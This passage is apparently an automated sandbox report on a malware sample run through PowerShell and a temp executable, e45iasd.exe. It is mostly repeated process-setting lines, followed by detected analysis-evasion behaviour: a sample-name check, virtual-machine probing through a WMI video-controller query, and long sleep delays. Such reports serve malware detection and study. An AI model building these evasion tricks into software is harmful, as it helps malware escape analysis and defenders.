        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion

        barindex
        Source: 5.2.powershell.exe.263b4b2c370.10.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main contains sample name check
        Source: 5.2.powershell.exe.263b45551b0.9.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main contains sample name check
        Source: 5.2.powershell.exe.263bc030000.12.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main contains sample name check
        Source: 5.2.powershell.exe.263b45a51e8.8.raw.unpack, sjQgeJFGkOfBsyocSykt.cs.Net Code: Main contains sample name check
        Source: c:\users\user\appdata\local\temp\e45iasd.exeKey value queried: Powershell behavior
        Source: c:\users\user\appdata\local\temp\e45iasd.exeKey value queried: Powershell behavior
        Source: c:\users\user\appdata\local\temp\e45iasd.exeKey value queried: Powershell behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: 1802B0F0000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: 1802B130000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: 2A363490000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: 2A363490000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: 1EB32910000 memory reserve | memory write watch
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeMemory allocated: 1EB32940000 memory reserve | memory write watch
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5513Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4256Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7318Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2327Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4989Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4691Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeWindow / User API: threadDelayed 7248
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeWindow / User API: threadDelayed 2314
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeWindow / User API: threadDelayed 6733
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeWindow / User API: threadDelayed 2693
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeWindow / User API: threadDelayed 6676
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeWindow / User API: threadDelayed 2805
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 5513 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7968Thread sleep count: 4256 > 30Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8000Thread sleep time: -19369081277395017s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7212Thread sleep time: -6456360425798339s >= -30000sJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 312Thread sleep time: -19369081277395017s >= -30000sJump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exe TID: 2192Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exe TID: 4192Thread sleep time: -22136092888451448s >= -30000s
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exe TID: 4860Thread sleep count: 6676 > 30
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exe TID: 4860Thread sleep count: 2805 > 30
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exe TID: 8148Thread sleep time: -25825441703193356s >= -30000s
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeThread delayed: delay time: 922337203685477
        Source: C:\Users\user\AppData\Local\Temp\e45iasd.exeThread delayed: delay time: 922337203685477
        Source: powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
        Source: powershell.exe, 00000008.00000002.1404589530.00000275584BA000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
